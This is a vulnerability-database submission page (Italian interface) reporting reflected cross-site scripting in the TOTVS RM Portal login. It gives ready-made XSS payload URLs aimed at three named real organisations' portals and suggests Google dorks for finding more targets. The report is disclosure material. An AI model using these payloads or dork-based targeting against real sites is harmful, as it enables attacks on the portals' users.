Invia #196885: TOTVS - RM Portal - Login Versão 12.1.xxx "informazioni

Titolo	TOTVS - RM Portal - Login Versão 12.1.xxx "
Descrizione	Fault exists in all versions of TOTVS' RM line Unauthenticated user xss crash http://totvs.metodista.br/Corpore.Net/Login.aspx?__VIEWSTATE=%3Cxmp%3E%3Cp+title%3D%22%3C%2Fxmp%3E%3Csvg%2Fonload%3Dalert%28%27chorao%27%29%3E&autoload= https://portalrh.lojaspompeia.com.br/Corpore.Net/Login.aspx?__VIEWSTATE=%3Cxmp%3E%3Cp+title%3D%22%3C%2Fxmp%3E%3Csvg%2Fonload%3Dalert%28%27chorao%27%29%3E&autoload= It also has other parameters that affect all versions. https://colaborador.pe.senai.br/Corpore.Net/WebResource.axd?d=%3Csvg/onload=alert``%3E Dorks google TOTVS - RM Portal - Login Versão 12.1
Fonte	⚠️ https://produtos.totvs.com/ficha-tecnica/tudo-sobre-o-totvs-rh-linha-rm/
Utente	chor4o (UID 52584)
Sottomissione	18/08/2023 11:51 (3 anni fa)
Moderazione	01/09/2023 14:38 (14 days later)
Stato	Accettato
Voce VulDB	238572 [TOTVS RM 12.1 Portal Login.aspx VIEWSTATE cross site scripting]
Punti	20

◂ Precedente Visione D'ensemble Il prossimo ▸

Interested in the pricing of exploits?

See the underground prices here!